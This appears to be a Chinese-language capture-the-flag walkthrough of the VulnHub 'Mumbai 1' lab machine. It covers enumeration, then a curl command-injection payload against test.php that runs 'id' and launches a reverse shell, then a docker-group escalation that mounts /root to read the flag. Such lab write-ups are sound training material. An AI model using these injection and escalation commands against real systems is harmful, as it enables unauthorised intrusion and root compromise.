靶机地址:
https://www.vulnhub.com/entry/mumbai-1,372/
主机探测:
主机端口扫描:
FTP 下载Note文件
TODO:
Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
secure - maybe this will shut those security researchers up.
Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
rebuild the server again.
- AbsoZed
意思就是可以使用docker来进行提权,因为HTTP使用的是docker容器跑的
HTTP目录扫描
http://10.10.203.18/drupal/
列目录为空
http://10.10.203.18/wordpress/ 无法访问
在枚举HTTP 8000端口
dirb http://10.10.203.18:8000 -X .php,.txt,.json,.xml,.py,.yml
+ http://10.10.203.18:8000/keywords.py (CODE:200|SIZE:1376)
+ http://10.10.203.18:8000/test.php (CODE:200|SIZE:64)
下载两个文件查看内容
test.php文件内容
Please POST a proper query. ex: https://caffeinatedengineers.com
keywords.py py脚本就是发送请求给URL
尝试请求下几个有用的URL
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
root at Hack404 in ~
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)
本地监听1234
执行:curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php
获取shell,尝试提权操作
docker run -v /root:/mnt -it alpine
# cd /root/
cd /root/
~ # cd /mnt
cd /mnt
/mnt # ls
ls
proof.txt
/mnt # cat proof.txt
OVER !!